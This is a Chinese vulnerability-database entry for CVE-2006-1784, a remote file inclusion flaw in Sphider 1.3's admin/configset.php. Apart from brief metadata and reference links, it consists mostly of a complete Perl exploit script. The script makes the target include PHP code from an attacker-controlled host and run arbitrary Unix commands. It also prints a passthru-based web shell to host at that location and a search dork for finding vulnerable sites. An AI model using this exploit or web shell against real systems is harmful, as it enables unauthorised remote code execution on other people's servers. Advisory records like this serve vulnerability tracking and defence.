Sphider admin/configset.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110055 漏洞类型 输入验证
发布时间 2006-04-12 更新时间 2006-04-25
CVE编号 CVE-2006-1784 CNNVD-ID CNNVD-200604-216
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/1665
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-216
|漏洞详情
当禁用register_globals时,Sphider1.3及早期版本中的admin/configset.php中存在的PHP远程文件包含漏洞允许远程攻击者借助于settings_dir参数中的URL执行任意PHP代码。
|漏洞EXP
#!/usr/bin/perl
use IO::Socket;

print "\r\nSphider <= 1.3 arbitrary remote inclusion\r\n" ;
print "-> works with register_globals = On & allow_url_fopen = On\r\n";
print "by rgod rgod<AT>autistici<DOT>org\r\n";
print "site: http://retrogod.altervista.org\r\n";
print "\r\ndork: \"powered by sphider\"\r\n";

sub main::urlEncode {
    my ($string) = @_;
    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
    #$string# =~ tr/.//;
    return $string;
 }

$serv=$ARGV[0];
$path=$ARGV[1];
$loc=urlEncode($ARGV[2]);
$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};

if (@ARGV < 4)
{
print "\r\nUsage:\r\n";
print "perl sphider_xpl.pl server path location command\r\n\r\n";
print "server         - Server where sphider is installed.\r\n";
print "path           - Path to sphider (ex: /sphider/ or just /) \r\n";
print "location       - a site with the code to include (without ending slash)\r\n";
print "command        - a Unix command\r\n\r\n";
print "Example:\r\n";
print "perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\r\n\r\n";
print "note: on http location you need this code in /conf.php/index.html :\r\n\r\n";
print "<?php\r\n";
print "ob_clean();\r\n";
print "if (get_magic_quotes_gpc())\r\n";
print "{\$_GET[\"cmd\"]=stripslashes(\$_GET[\"cmd\"]);}\r\n";
print "ini_set(\"max_execution_time\",0);\r\n";
print "echo 56789;\r\n";
print "passthru(\$_GET[\"cmd\"]);\r\n";
print "die;\r\n";
print "?>\r\n";
exit();
}
  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
  or die "[+] Connecting ... Could not connect to host.\n\n";
  print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n";
  print $sock "Host: ".$serv."\r\n";
  print $sock "Connection: Close\r\n\r\n";
  $out="";
  while ($answer = <$sock>) {
    $out.=$answer;
  }
  close($sock);
  @temp= split /56789/,$out,2;
  if ($#temp>0) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
  #if you are here...
  print "\r\nExploit failed...\r\n";

# milw0rm.com [2006-04-12]
|参考资料

来源:BID
名称:17514
链接:http://www.securityfocus.com/bid/17514
来源:VUPEN
名称:ADV-2006-1341
链接:http://www.frsirt.com/english/advisories/2006/1341
来源:SECUNIA
名称:19642
链接:http://secunia.com/advisories/19642
来源:MILW0RM
名称:1665
链接:http://milw0rm.com/exploits/1665
来源:XF
名称:sphider-configset-file-inclusion(25780)
链接:http://xforce.iss.net/xforce/xfdb/25780